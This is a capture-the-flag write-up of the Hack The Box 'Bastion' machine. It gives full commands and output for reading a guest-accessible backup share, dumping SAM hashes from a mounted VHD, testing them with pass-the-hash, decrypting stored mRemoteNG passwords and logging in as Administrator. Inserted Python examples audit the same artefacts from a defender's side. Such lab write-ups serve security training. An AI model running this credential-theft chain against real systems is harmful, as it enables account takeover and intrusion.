Bastion

1. User

1.1. Recon

1.1.1. PortScan

┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# nmap 10.129.136.29
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-21 09:33 EST
Nmap scan report for 10.129.136.29
Host is up (0.12s latency).
Not shown: 995 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
5985/tcp open  wsman

Nmap done: 1 IP address (1 host up) scanned in 12.77 seconds
┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# nxc smb  10.129.136.29 -u guest  -p ''  --shares --local-auth
SMB         10.129.136.29   445    BASTION          [*] Windows Server 2016 Standard 14393 x64 (name:BASTION) (domain:BASTION) (signing:False) (SMBv1:True)
SMB         10.129.136.29   445    BASTION          [+] BASTION\guest:
SMB         10.129.136.29   445    BASTION          [*] Enumerated shares
SMB         10.129.136.29   445    BASTION          Share           Permissions     Remark
SMB         10.129.136.29   445    BASTION          -----           -----------     ------
SMB         10.129.136.29   445    BASTION          ADMIN$                          Remote Admin
SMB         10.129.136.29   445    BASTION          Backups         READ,WRITE
SMB         10.129.136.29   445    BASTION          C$                              Default share
SMB         10.129.136.29   445    BASTION          IPC$            READ            Remote IPC

1.2. SMB

┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# impacket-smbclient guest:''@10.129.136.29
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

Password:
Type help for list of commands
# shares
ADMIN$
Backups
C$
IPC$
# use Backups
# ls
drw-rw-rw-          0  Fri Nov 21 09:41:15 2025 .
drw-rw-rw-          0  Fri Nov 21 09:41:15 2025 ..
-rw-rw-rw-          0  Fri Nov 21 09:41:15 2025 JhpZDUsBtH.txt
-rw-rw-rw-        116  Tue Apr 16 07:43:19 2019 note.txt
-rw-rw-rw-          0  Fri Feb 22 07:43:28 2019 SDT65CB.tmp
drw-rw-rw-          0  Fri Feb 22 07:44:02 2019 WindowsImageBackup
drw-rw-rw-          0  Fri Nov 21 09:41:14 2025 wQornZEWbD
# get note.txt
# tress
*** Unknown syntax: tress
# tree
/JhpZDUsBtH.txt
/note.txt
/SDT65CB.tmp
/WindowsImageBackup/L4mpje-PC
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351
/WindowsImageBackup/L4mpje-PC/Catalog
/WindowsImageBackup/L4mpje-PC/MediaId
/WindowsImageBackup/L4mpje-PC/SPPMetadataCache
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/BackupSpecs.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351/cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml
/WindowsImageBackup/L4mpje-PC/Catalog/BackupGlobalCatalog
/WindowsImageBackup/L4mpje-PC/Catalog/GlobalCatalog
/WindowsImageBackup/L4mpje-PC/SPPMetadataCache/{cd113385-65ff-4ea2-8ced-5630f6feca8f}
Finished - 23 files and folders
#

note.txt

┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# cat note.txt

Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.

In short: don't pull the whole backup file down locally, because the VPN to the subsidiary is too slow.

There are some .vhd files:

# ls
drw-rw-rw-          0  Fri Feb 22 07:45:32 2019 .
drw-rw-rw-          0  Fri Feb 22 07:45:32 2019 ..
-rw-rw-rw-   37761024  Fri Feb 22 07:44:03 2019 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
-rw-rw-rw- 5418299392  Fri Feb 22 07:45:32 2019 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
-rw-rw-rw-       1186  Fri Feb 22 07:45:32 2019 BackupSpecs.xml
-rw-rw-rw-       1078  Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_AdditionalFilesc3b9f3c7-5e52-4d5e-8b20-19adc95a34c7.xml
-rw-rw-rw-       8930  Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Components.xml
-rw-rw-rw-       6542  Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_RegistryExcludes.xml
-rw-rw-rw-       2894  Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f.xml
-rw-rw-rw-       1488  Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writer542da469-d3e1-473c-9f4f-7847f01fc64f.xml
-rw-rw-rw-       1484  Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writera6ad56c2-b509-4e6c-bb19-49d8f43532f0.xml
-rw-rw-rw-       3844  Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerafbab4a2-367d-4d15-a586-71dbb18f8485.xml
-rw-rw-rw-       3988  Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writerbe000cbe-11fe-4426-9c58-531aa6355fc4.xml
-rw-rw-rw-       7110  Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writercd3f2362-8bef-46c7-9181-d62844cdc0b2.xml
-rw-rw-rw-    2374620  Fri Feb 22 07:45:32 2019 cd113385-65ff-4ea2-8ced-5630f6feca8f_Writere8132975-6f93-4464-a53e-1050253ae220.xml

5 GB, damn.

┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# cat BackupSpecs.xml
<BackupSpecs>
  <FileSpecs>
    <Volume Name="\\?\Volume{9b9cfbc3-369e-11e9-a17c-806e6f6e6963}\" 
            AccessPath="" 
            OriginalAccessPath="" 
            Label="" 
            OriginalLabel="">
      <FileSpec FilePath="\\?\Volume{9b9cfbc3-369e-11e9-a17c-806e6f6e6963}\" 
                FileName="*" 
                IsRecursive="true" 
                IsInclude="true" />
    </Volume>
    <Volume Name="\\?\Volume{9b9cfbc4-369e-11e9-a17c-806e6f6e6963}\" 
            AccessPath="C:" 
            OriginalAccessPath="C:" 
            Label="" 
            OriginalLabel="">
      <FileSpec FilePath="C:\" 
                FileName="*" 
                IsRecursive="true" 
                IsInclude="true" />
    </Volume>
  </FileSpecs>
  <SystemState IsPresent="false" />
  <AllCritical IsPresent="false" />
</BackupSpecs>

This shows that the small file is a partition with no drive letter, and the large one is the backup of the C: drive.
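
Added example (not from the original write-up): matching the volume GUIDs in BackupSpecs.xml to the .vhd files and their sizes from the listing picks out the C: image before anything is transferred. It assumes, as observed on this page, that each .vhd is named after its volume GUID; the function names are illustrative.

```python
import re
import xml.etree.ElementTree as ET

# BackupSpecs.xml as shown on this page (attributes trimmed to the ones used here).
BACKUP_SPECS = r"""<BackupSpecs>
  <FileSpecs>
    <Volume Name="\\?\Volume{9b9cfbc3-369e-11e9-a17c-806e6f6e6963}\" AccessPath="" OriginalAccessPath="">
      <FileSpec FilePath="\\?\Volume{9b9cfbc3-369e-11e9-a17c-806e6f6e6963}\" FileName="*" IsRecursive="true" IsInclude="true" />
    </Volume>
    <Volume Name="\\?\Volume{9b9cfbc4-369e-11e9-a17c-806e6f6e6963}\" AccessPath="C:" OriginalAccessPath="C:">
      <FileSpec FilePath="C:\" FileName="*" IsRecursive="true" IsInclude="true" />
    </Volume>
  </FileSpecs>
</BackupSpecs>"""

# Three lines of the smbclient `ls` output from this page.
LISTING = """\
-rw-rw-rw-   37761024  Fri Feb 22 07:44:03 2019 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
-rw-rw-rw- 5418299392  Fri Feb 22 07:45:32 2019 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
-rw-rw-rw-       1186  Fri Feb 22 07:45:32 2019 BackupSpecs.xml
"""

GUID = re.compile(r"\{([0-9a-fA-F-]{36})\}")
LS_LINE = re.compile(r"^\S+\s+(\d+)\s+\w{3} \w{3} +\d+ [\d:]+ \d{4} (.+)$")

def vhd_sizes(listing):
    """Map lower-cased GUID (file name without .vhd) to size in bytes."""
    sizes = {}
    for line in listing.splitlines():
        m = LS_LINE.match(line)
        if m and m.group(2).lower().endswith(".vhd"):
            sizes[m.group(2)[:-4].lower()] = int(m.group(1))
    return sizes

def map_volumes(specs_xml, listing):
    """One row per <Volume>: image file, drive letter (None if unmounted), size."""
    sizes = vhd_sizes(listing)
    rows = []
    for vol in ET.fromstring(specs_xml).iter("Volume"):
        m = GUID.search(vol.get("Name", ""))
        if not m:
            continue
        guid = m.group(1).lower()
        rows.append({"vhd": guid + ".vhd",
                     "access_path": vol.get("AccessPath") or None,
                     "size": sizes.get(guid)})
    return rows

def system_image(rows):
    """Return the row whose volume was mounted as C:, or None."""
    return next((r for r in rows if r["access_path"] == "C:"), None)

if __name__ == "__main__":
    for row in map_volumes(BACKUP_SPECS, LISTING):
        print(row)
```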

1.3. mount vhd

Using guestmount:

┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# sudo guestmount -a 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd -m /dev/sda1 --ro /mnt/vhd
Warning: program compiled against libxml 215 using older 214

┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# ls /mnt/vhd
 Boot   bootmgr   BOOTSECT.BAK  'System Volume Information'

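Nothing much here; the useful data is evidently in the C: drive image, for example the SAM and SYSTEM hives, which we can run a secrets dump against.

Downloading 5 GB is out of the question, though. Instead, the SMB share can be mounted locally, following 0xdf's approach: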

mount -t cifs //10.129.23.67/backups /mnt -o user=,password=

Then mount the image:

┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# guestmount -a /mnt/backup/WindowsImageBackup/L4mpje-PC/Backup\ 2019-02-22\ 124351/9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd -i --ro /mnt/vhd
Warning: program compiled against libxml 215 using older 214

┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# ls /mnt/vhd
'$Recycle.Bin'   config.sys                pagefile.sys   ProgramData      Recovery                     Users
 autoexec.bat   'Documents and Settings'   PerfLogs      'Program Files'  'System Volume Information'   Windows

1.4. Secrets dump

┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# cp /mnt/vhd/Windows/System32/config/SAM ./

┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# cp /mnt/vhd/Windows/System32/config/SYSTEM ./

┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# impacket-secretsdump -sam SAM -system SYSTEM local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Cleaning up...
┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# nxc smb 10.129.136.29 -u administrator -H 31d6cfe0d16ae931b73c59d7e0c089c0
SMB         10.129.136.29   445    BASTION          [*] Windows Server 2016 Standard 14393 x64 (name:BASTION) (domain:Bastion) (signing:False) (SMBv1:True)
SMB         10.129.136.29   445    BASTION          [-] Bastion\administrator:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_LOGON_FAILURE

┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# nxc smb 10.129.136.29 -u 4mpje -H 26112010952d963c8dc4217daec986d9
SMB         10.129.136.29   445    BASTION          [*] Windows Server 2016 Standard 14393 x64 (name:BASTION) (domain:Bastion) (signing:False) (SMBv1:True)
SMB         10.129.136.29   445    BASTION          [+] Bastion\4mpje:26112010952d963c8dc4217daec986d9 (Guest)

The 4mpje account can log in.

Password: bureaulampje

The target has the SSH port open, so we can log in with the plaintext password.
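
Added example (not part of the original write-up): a triage of the secretsdump lines above. `31d6cfe0d16ae931b73c59d7e0c089c0` is the NT hash of an empty password, so the Administrator and Guest entries in this backup hold no real password; only L4mpje does. Function and field names are illustrative.

```python
# Well-known constants. EMPTY_LM is the LM hash of an empty password and is also
# what secretsdump prints when no LM hash is stored; EMPTY_NT is the NT hash of "".
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"
BUILTIN_RIDS = {500: "built-in Administrator", 501: "built-in Guest"}

# secretsdump output copied from this page.
DUMP = """\
[*] Target system bootKey: 0x8b56b2cb5033d8e2e289c26f8939a25f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
[*] Cleaning up...
"""

def parse_sam(dump):
    """Parse user:rid:lmhash:nthash::: lines, skipping banners and status lines."""
    accounts = []
    for line in dump.splitlines():
        parts = line.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        lm, nt = parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            continue
        rid = int(parts[1])
        accounts.append({
            "user": parts[0],
            "rid": rid,
            "role": BUILTIN_RIDS.get(rid, "local user"),
            "lm_stored": lm != EMPTY_LM,        # a real LM hash is present
            "blank_password": nt == EMPTY_NT,   # NT hash of the empty string
            "nt": nt,
        })
    return accounts

def exposed_by_backup(accounts):
    """Accounts whose NT hash represents a real password and so needs rotating."""
    return [a["user"] for a in accounts if not a["blank_password"]]

if __name__ == "__main__":
    for a in parse_sam(DUMP):
        state = "blank password" if a["blank_password"] else "password set"
        print(f'{a["user"]:15} rid={a["rid"]:<5} {a["role"]:24} {state}')
    print("rotate:", exposed_by_backup(parse_sam(DUMP)))
```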

1.5. shell as L4mpje via ssh

┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# ssh L4mpje@10.129.136.29
L4mpje@10.129.136.29's password:
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

l4mpje@BASTION C:\Users\L4mpje>
l4mpje@BASTION C:\Users\L4mpje>whoami
bastion\l4mpje

l4mpje@BASTION C:\Users\L4mpje>

2. System

2.1. recon

First, run winPEAS:

 [+] INSTALLED SOFTWARE
   [i] Some weird software? Check for vulnerabilities in unknow software installed
   [?] https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#applications

Common Files
Common Files
Internet Explorer
Internet Explorer
Microsoft.NET
>>>> mRemoteNG
OpenSSH-Win64
PackageManagement
VMware
Windows Defender
Windows Defender
Windows Mail
Windows Mail
Windows Media Player
Windows Media Player
Windows Multimedia Platform
Windows Multimedia Platform
Windows NT
Windows NT
Windows Photo Viewer
Windows Photo Viewer
Windows Portable Devices
Windows Portable Devices
WindowsPowerShell
WindowsPowerShell
    InstallLocation    REG_SZ    C:\Program Files\VMware\VMware Tools\
>>>>     InstallLocation    REG_SZ    C:\Program Files (x86)\mRemoteNG\

 [+] Remote Desktop Credentials Manager
   [?] https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html#remote-desktop-credential-manager

2.2. mRemoteNG

mRemoteNG is installed on the target.

Decrypt the password directly, following my notes.

 Directory of C:\Users\L4mpje\AppData\Roaming\mRemoteNG

22-02-2019  14:03    <DIR>          .
22-02-2019  14:03    <DIR>          ..
>>>> 22-02-2019  14:03             6.316 confCons.xml
22-02-2019  14:02             6.194 confCons.xml.20190222-1402277353.backup
22-02-2019  14:02             6.206 confCons.xml.20190222-1402339071.backup
22-02-2019  14:02             6.218 confCons.xml.20190222-1402379227.backup
22-02-2019  14:02             6.231 confCons.xml.20190222-1403070644.backup
22-02-2019  14:03             6.319 confCons.xml.20190222-1403100488.backup
22-02-2019  14:03             6.318 confCons.xml.20190222-1403220026.backup
22-02-2019  14:03             6.315 confCons.xml.20190222-1403261268.backup
22-02-2019  14:03             6.316 confCons.xml.20190222-1403272831.backup
22-02-2019  14:03             6.315 confCons.xml.20190222-1403433299.backup
22-02-2019  14:03             6.316 confCons.xml.20190222-1403486580.backup
22-02-2019  14:03                51 extApps.xml
22-02-2019  14:03             5.217 mRemoteNG.log
22-02-2019  14:03             2.245 pnlLayout.xml
22-02-2019  14:01    <DIR>          Themes
              14 File(s)         76.577 bytes
               3 Dir(s)   4.817.973.248 bytes free
               

confCons.xml is the connection configuration file.

Copy it into the SMB share directory, then download it and decrypt it locally.

l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>copy  confCons.xml c:\Backups\confCons.xml
        1 file(s) copied.
# get confCons.xml
# exit

┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# ls
9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd  confCons.xml       note      SAM       SYSTEM
BackupSpecs.xml                           lab_C1trus33.ovpn  note.txt  SECURITY  winPEAS.bat


┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# git clone https://github.com/haseebT/mRemoteNG-Decrypt.git
Cloning into 'mRemoteNG-Decrypt'...
remote: Enumerating objects: 19, done.
remote: Total 19 (delta 0), reused 0 (delta 0), pack-reused 19 (from 1)
Receiving objects: 100% (19/19), 14.80 KiB | 222.00 KiB/s, done.
Resolving deltas: 100% (4/4), done.
                                                                                
┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# cat confCons.xml
<?xml version="1.0" encoding="utf-8"?>
<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" Export="false" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="ZSvKI7j224Gf/twXpaP5G2QFZMLr1iO1f5JKdtIKL6eUg+eWkL5tKO886au0ofFPW0oop8R8ddXKAx4KK7sAk6AA" ConfVersion="2.6">
    <Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="500e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" Hostname="127.0.0.1" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" 
InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritVNCColors="false" InheritVNCSmartSizeMode="false" InheritVNCViewOnly="false" InheritRDGatewayUsageMethod="false" InheritRDGatewayHostname="false" InheritRDGatewayUseConnectionCredentials="false" InheritRDGatewayUsername="false" InheritRDGatewayPassword="false" InheritRDGatewayDomain="false" />
    <Node Name="L4mpje-PC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="8d3579b2-e68e-48c1-8f0f-9ee1347c9128" Username="L4mpje" Domain="" Password="yhgmiu5bbuamU3qMUKc/uYDdmbMrJZ/JvR1kYe4Bhiu8bXybLxVnO0U9fKRylI7NcB9QuRsZVvla8esB" Hostname="192.168.1.75" Protocol="RDP" PuttySession="Default Settings" Port="3389" ConnectToConsole="false" UseCredSsp="true" RenderingEngine="IE" ICAEncryptionStrength="EncrBasic" RDPAuthenticationLevel="NoAuth" RDPMinutesToIdleTimeout="0" RDPAlertIdleTimeout="false" LoadBalanceInfo="" Colors="Colors16Bit" Resolution="FitToWindow" AutomaticResize="true" DisplayWallpaper="false" DisplayThemes="false" EnableFontSmoothing="false" EnableDesktopComposition="false" CacheBitmaps="false" RedirectDiskDrives="false" RedirectPorts="false" RedirectPrinters="false" RedirectSmartCards="false" RedirectSound="DoNotPlay" SoundQuality="Dynamic" RedirectKeys="false" Connected="false" PreExtApp="" PostExtApp="" MacAddress="" UserField="" ExtApp="" VNCCompression="CompNone" VNCEncoding="EncHextile" VNCAuthMode="AuthVNC" VNCProxyType="ProxyNone" VNCProxyIP="" VNCProxyPort="0" VNCProxyUsername="" VNCProxyPassword="" VNCColors="ColNormal" VNCSmartSizeMode="SmartSAspect" VNCViewOnly="false" RDGatewayUsageMethod="Never" RDGatewayHostname="" RDGatewayUseConnectionCredentials="Yes" RDGatewayUsername="" RDGatewayPassword="" RDGatewayDomain="" InheritCacheBitmaps="false" InheritColors="false" InheritDescription="false" InheritDisplayThemes="false" InheritDisplayWallpaper="false" InheritEnableFontSmoothing="false" InheritEnableDesktopComposition="false" InheritDomain="false" InheritIcon="false" InheritPanel="false" InheritPassword="false" InheritPort="false" InheritProtocol="false" InheritPuttySession="false" InheritRedirectDiskDrives="false" InheritRedirectKeys="false" InheritRedirectPorts="false" InheritRedirectPrinters="false" InheritRedirectSmartCards="false" InheritRedirectSound="false" InheritSoundQuality="false" InheritResolution="false" 
InheritAutomaticResize="false" InheritUseConsoleSession="false" InheritUseCredSsp="false" InheritRenderingEngine="false" InheritUsername="false" InheritICAEncryptionStrength="false" InheritRDPAuthenticationLevel="false" InheritRDPMinutesToIdleTimeout="false" InheritRDPAlertIdleTimeout="false" InheritLoadBalanceInfo="false" InheritPreExtApp="false" InheritPostExtApp="false" InheritMacAddress="false" InheritUserField="false" InheritExtApp="false" InheritVNCCompression="false" InheritVNCEncoding="false" InheritVNCAuthMode="false" InheritVNCProxyType="false" InheritVNCProxyIP="false" InheritVNCProxyPort="false" InheritVNCProxyUsername="false" InheritVNCProxyPassword="false" InheritV
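
Added example (not the mRemoteNG project's code and not from the original write-up): a defender-side audit of a confCons.xml like the one above, flagging stored passwords and the protection settings visible in the root element. The sample is constructed with placeholder Password/Protected values and one extra node; the iteration threshold, the privileged-name list and the finding codes are assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed sample: attribute names as in the confCons.xml on this page, trimmed,
# with placeholder Protected/Password values (not real ciphertext) and one extra node.
CONF = """<mrng:Connections xmlns:mrng="http://mremoteng.org" Name="Connections" EncryptionEngine="AES" BlockCipherMode="GCM" KdfIterations="1000" FullFileEncryption="false" Protected="UExBQ0VIT0xERVI=" ConfVersion="2.6">
    <Node Name="DC" Type="Connection" Username="Administrator" Domain="" Password="UExBQ0VIT0xERVItMQ==" Hostname="127.0.0.1" Protocol="RDP" RDPAuthenticationLevel="NoAuth" />
    <Node Name="L4mpje-PC" Type="Connection" Username="L4mpje" Domain="" Password="UExBQ0VIT0xERVItMg==" Hostname="192.168.1.75" Protocol="RDP" RDPAuthenticationLevel="NoAuth" />
    <Node Name="jump" Type="Connection" Username="" Domain="" Password="" Hostname="198.51.100.7" Protocol="SSH2" />
</mrng:Connections>"""

MIN_KDF_ITERATIONS = 100_000            # assumption: local policy floor, not an mRemoteNG constant
PRIVILEGED = {"administrator", "root"}  # assumption: account names treated as high-value

def audit(conf_xml):
    """Return (scope, code, detail) findings for one confCons.xml document."""
    root = ET.fromstring(conf_xml.encode("utf-8"))
    findings = []
    if root.get("FullFileEncryption", "false").lower() != "true":
        findings.append(("file", "METADATA_CLEARTEXT",
                         "hostnames and usernames are readable without any key"))
    iterations = int(root.get("KdfIterations", "0"))
    if iterations < MIN_KDF_ITERATIONS:
        findings.append(("file", "LOW_KDF_ITERATIONS", f"KdfIterations={iterations}"))
    for node in root.iter("Node"):
        if node.get("Type") != "Connection":
            continue
        name, user = node.get("Name", "?"), node.get("Username", "")
        if node.get("Password"):
            code = ("STORED_PRIVILEGED_PASSWORD" if user.lower() in PRIVILEGED
                    else "STORED_PASSWORD")
            findings.append((name, code, f"{user}@{node.get('Hostname', '')}"))
        if node.get("Protocol") == "RDP" and node.get("RDPAuthenticationLevel") == "NoAuth":
            findings.append((name, "RDP_NOAUTH", "RDPAuthenticationLevel=NoAuth"))
    return findings

def backup_copies(filenames):
    """Backup copies of confCons.xml carry the same stored passwords as the live file."""
    return [f for f in filenames
            if f.startswith("confCons.xml.") and f.endswith(".backup")]

if __name__ == "__main__":
    for scope, code, detail in audit(CONF):
        print(f"{scope:10} {code:28} {detail}")
```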

┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# cd mRemoteNG-Decrypt

┌──(root㉿kali)-[~/Desktop/htb/Bastion/mRemoteNG-Decrypt]
└─# python mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2
┌──(root㉿kali)-[~/Desktop/htb/Bastion]
└─# evil-winrm -i 10.129.136.29  -u administrator -p thXLHM96BeKL0ER2

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ../desktop/root.txt
062bfb1b3abe8598c03eb59b153ed1fd